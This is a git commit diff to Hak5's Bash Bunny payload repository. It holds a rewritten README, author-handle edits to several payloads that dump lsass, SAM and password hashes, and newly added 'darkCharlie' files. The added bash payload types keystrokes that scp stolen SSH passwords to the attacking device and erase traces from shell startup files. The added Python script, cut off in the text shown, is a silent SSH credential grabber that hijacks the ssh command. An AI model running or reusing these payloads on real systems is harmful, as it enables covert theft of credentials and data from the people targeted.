Merge branch 'hak5:master' into master
commit
a57046358b
261
README.md
261
README.md
|
@ -1,45 +1,242 @@
|
|||
# Payload Library for the Bash Bunny by Hak5
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||
|
||||
## About the Bash Bunny
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5")
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
- Discord: [https://hak5.org/discord](https://hak5.org/discord)
|
||||
|
||||
![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg)
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
## Documentation
|
||||
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
## Legal
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
## Contributing
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please adhere to the following best practices and style guide when submitting a payload.
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
### Naming Conventions
|
||||
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
### Comments
|
||||
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
|
||||
|
||||
Title: SMB Exfiltrator
|
||||
Description: Exfiltrates files from %userprofile%\documents via SMB
|
||||
Author: Hak5Darren
|
||||
Target: Windows XP SP3 - Latest
|
||||
Dependencies: impacket
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
@ -72,4 +269,22 @@ Stages should be documented with comments
|
|||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -14,4 +14,4 @@ What is MiniDumpBunny?
|
|||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -12,10 +12,10 @@ What is ProcDumpBunny?
|
|||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ProcDumpBunny
|
||||
# Description: Dump lsass.exe with a renamed version of procdump
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SamDumpBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
|
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
|||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: SamDumpBunny
|
||||
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SessionBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
(Credit for SessionGopher: Brandon Arvanaghi)
|
||||
|
||||
Version: 1.0
|
||||
|
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Wait for the script to finish and decide what you wanna do with the information gathered
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
|
|
|
@ -43,7 +43,7 @@
|
|||
o
|
||||
o_
|
||||
/ ". SessionGopher
|
||||
," _-" Bunny Edition (0iphor13)
|
||||
," _-" Bunny Edition (0i41E)
|
||||
," m m
|
||||
..+ ) Brandon Arvanaghi
|
||||
`m..m @arvanaghi | arvanaghi.com
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SessionBunny
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -0,0 +1,74 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: darkCharlie{Cleaner}
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
#
|
||||
# Get the ssh creds from our loot collection.
|
||||
# And clean up after
|
||||
#
|
||||
# White | Ready
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
DUCKY_LANG us
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
LOOT=/root/udisk/loot/darkCharlie
|
||||
mkdir -p $LOOT
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json #nice hiding of known host info
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING hak5bunny
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think.
|
||||
QUACK ENTER
|
||||
QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
|
||||
else
|
||||
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
|
||||
fi
|
||||
QUACK ENTER
|
||||
QUACK DELAY 200
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK DELAY 2000
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK STRING exit
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
fi
|
||||
LED SUCCESS
|
||||
#See you, space cowboy...
|
|
@ -0,0 +1,415 @@
|
|||
#! PYTHON_EXECUTABLE_GOES_HERE
|
||||
|
||||
'''
|
||||
Dark Charlie remote shell cred grabber
|
||||
|
||||
Version 0.1
|
||||
|
||||
Using open-ended exceptions here to maintain silence when errors happen
|
||||
'''
|
||||
|
||||
originalSSHExecutable = "ORIGINAL_SSH_EXE_GOES_HERE"
|
||||
|
||||
def cantLoadModuleError():
|
||||
import sys
|
||||
if sys.version_info.major < 3:
|
||||
return ImportError
|
||||
if sys.version_info.minor < 6:
|
||||
return ImportError
|
||||
else:
|
||||
return ModuleNotFoundError
|
||||
|
||||
def getLootFileName():
|
||||
import os
|
||||
thisFullPath = os.path.abspath(__file__)
|
||||
thisDirectory = os.path.split(thisFullPath)[0]
|
||||
lootFile = thisDirectory + os.sep + "ssh.conf"
|
||||
return os.path.join(lootFile)
|
||||
|
||||
def initializeThisScript():
|
||||
'''This function will be run the first time by the bunny'''
|
||||
import subprocess
|
||||
import re
|
||||
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
|
||||
pythonExecutable = pathFinder.stdout.read().strip()
|
||||
pathFinder = subprocess.Popen("which ssh".split(), stdout = subprocess.PIPE)
|
||||
sshExecutable = pathFinder.stdout.read().strip()
|
||||
try:
|
||||
import paramiko
|
||||
except cantLoadModuleError():
|
||||
try:
|
||||
paramikoInstaller = subprocess.Popen("pip install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
paramikoInstaller = subprocess.Popen("pip3 install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
import json
|
||||
except cantLoadModuleError():
|
||||
try:
|
||||
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
try:
|
||||
import getpass
|
||||
except:
|
||||
try:
|
||||
getPassInstaller = subprocess.Popen("pip install --user getpass", stdout = subprocess.PIPE, stderr = subprocess.PIPE)
|
||||
except:
|
||||
pass
|
||||
thisFileName = __file__
|
||||
thisFile = open(thisFileName, 'r')
|
||||
originalCode = thisFile.read()
|
||||
thisFile.close()
|
||||
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
|
||||
newCode = re.sub("ORIGINAL_SSH_EXE_GOES_HERE", sshExecutable, newCode, 1)
|
||||
thisFile = open(thisFileName, 'w')
|
||||
thisFile.write(newCode)
|
||||
thisFile.close()
|
||||
createLootFile(getLootFileName())
|
||||
quit()
|
||||
|
||||
def createLootFile(lootFileName):
|
||||
import json
|
||||
initialData = {"configFiles":{}, "passwords":{}}
|
||||
addDefaultSSHConfigFilesToLoot(initialData)
|
||||
lootFile = open(lootFileName, 'w')
|
||||
